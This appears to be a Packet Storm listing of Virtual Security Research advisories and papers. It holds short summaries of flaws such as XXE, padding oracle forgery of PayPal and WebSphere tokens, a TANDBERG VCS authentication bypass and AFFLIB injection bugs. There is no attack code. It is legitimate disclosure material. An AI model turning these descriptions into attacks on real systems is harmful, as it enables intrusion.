Java and Python both have URL handling code that can be leveraged for XML external entity (XXE) injection and SSRF attacks.
9f2a5aa311b233621706991238e47f4e31fc0b190ca89a1f42a16cfca5d09c4cPython's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme.
9fea0de30ead37c21a774ad8b50ab697e88f3e051112390e3be85d2e599d044fThe eXtensible Markup Language (XML) is an extremely pervasive technology used in countless software projects. A core feature of XML is the ability to define and validate document structure using schemas and document type definitions (DTDs). When used incorrectly, certain aspects of these document definition and validation features can lead to security vulnerabilities in applications that use XML. This document attempts to provide an up to date reference on these attacks, enumerating all publicly known techniques applicable to the most popular XML parsers in use while exploring a few novel attacks as well.
8e82def158ebfbe41cc7595829128a612d02d271dadd2f1c5596bfb75b802a36The main PayPal web site sets a cookie named "aksession" which contains a blob of base64-encoded ciphertext. This ciphertext is encrypted using a 64-bit block cipher in CBC mode and does not have any other integrity protection. Naturally, this means the aksession cookie is vulnerable to a padding oracle attack allowing full decryption and forgery.
ba96e4f85c1954558a6465548df5a7c14c4b67362f6c526a4c2c191b176d6879In February 2013, VSR identified a vulnerability in the IBM WebSphere Commerce framework which could allow an attacker to tamper with values stored in the "krypto" URL parameter. This parameter is encrypted with a block cipher without any independent integrity protection. This, combined with observed application behavior, allows for padding oracle attacks which can be used to decrypt the krypto token and forge new tokens with arbitrary embedded parameters.
5998d6a975a57dc3921286cababdc5aa780a65141183d9726f3d8938c1392707VSR identified a vulnerability in multiple open source office products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe interpretation of XML files with custom entity declarations. Deeper analysis revealed that the vulnerability was caused by acceptance of external entities by the libraptor library, which is used by librdf and is in turn used by these office products.
c080c190d86a9fe75c277115920d4c554a70b66f10a4c4abc47cf7b1079c5232An XML External Entity (XXE) attack is possible in OpenOffice.org versions 3.3 and 3.4 Beta. This vulnerability exploits the way in which external entities are processed in certain XML components of ODF documents.
8eebd992aa35f4faf62775e9bf55d28de394b1f4f67b8928b0375d38ba17a838RegLookup is a small command line utility for parsing and searching registry files from Windows NT and later.
c9123786bc1be1a714c59e2fabae693d434698ce4d3fc44847cb847bff26b686RegLookup is a small command line utility for parsing and searching registry files from Windows NT and later.
b7ae9e5c13f949ef958da4cba741067516bbc4c2800e033ff0d6ad4506945406Virtual Security Research, LLC. Security Advisory - Over the last several years, VSR analysts had observed unusual behavior in multiple WebLogic deployments when certain special characters were URL encoded and appended to URLs. In late April, 2010 VSR began researching this more in depth and found that the issue could allow for HTTP header injection and HTTP request smuggling attacks.
5d7636d4025d8667dd9edaf1762d3650f321ba8bf02999b83dd50d2261a56effVirtual Security Research, LLC. Security Advisory - On December 2nd, VSR identified an authentication bypass vulnerability in TANDBERG's Video Communication Server, firmware version x4.2.1. This vulnerability allows for the complete bypass of authentication in the administrative web console. Since this web interface can be used to execute arbitrary code on the appliance as root (via software updates), the severity is considered critical.
db51c425156ad6e9f3fa40fb9a1383e98edfded1cb0710c6c58c4a658f0b3a0bVirtual Security Research, LLC. Security Advisory - On December 3rd, VSR identified a directory traversal and file retrieval vulnerability in the TANDBERG's Video Communication Server. This issue would allow an authenticated attacker (who has access as an administrator or less privileged user on the web administration interface) to retrieve files from the filesystem which are readable by the "nobody" system user.
ecd6138fe7cb748fda93151615a0f39b450b83fd760e7df84e7bd345e9f97124Virtual Security Research, LLC. Security Advisory - On December 2nd, VSR identified a SSH service authentication weakness vulnerability in the TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances.
5d59b48678f9f742a235347210d3b7f85ea422e15a8e88168874895fb1bf8af4RegLookup is a small command line utility for parsing and searching registry files from Windows NT and later.
2efcef5aae5418aac5d3ebe7af46e05349622d4e16ab73186e38b6c28762a94eVirtual Security Research, LLC. Security Advisory - In mid-January, VSR identified a vulnerability in Google Chrome which could be used in phishing attacks in specific types of web sites. This issue may make it much easier to convince a victim to submit web application credentials to the attacker's site.
f3601476eca991b5fbd55769dd6d77727430ebaa9cd28fc2bb03eb2fdff6501aWhitepaper called Weaning The Web Off Of Session Cookies. It compares the security weaknesses and usability limitations of both cookie-based session management and HTTP digest authentication; demonstrating how digest authentication is clearly the more secure system in practice.
8037409600569b8d43de2c78faf6df1c248608e53de405e52921675f233564e4VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site.
8ca3bf4453e1d97e1df8cb1777248b40098c96ebee21fac715d1bd6643e51396Virtual Security Research, LLC. Security Advisory - Multiple buffer overflows exist in AFFLIB version 2.2.0. Earlier versions may also be affected.
559b496c894460a6c954813164a9b04a3bee9aa0a0423d28cdfb43a930ac0ea6Virtual Security Research, LLC. Security Advisory - A Time-of-Check-Time-of-Use file race condition exists in AFFLIB versions 2.2.0 through 2.2.8.
198a217781a92be69e6ee7057a6ba2ab8414efcd5535a2834fc9fd680333a5e1Virtual Security Research, LLC. Security Advisory - Multiple shell metacharacter injection vulnerabilities exist in AFFLIB versions 2.2.0 through 2.2.8.
1b4c3f3ed71f7e73122c92241745552bde104cc387630e22fec3523c20c385afVirtual Security Research, LLC. Security Advisory - Multiple format string injection vulnerabilities exist in AFFLIB versions 2.2.0 through 2.2.8.
1ebfffd144ea043de56b7a47b8351819da202d7d00c1f818e3aa9b8b67cf0c04
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed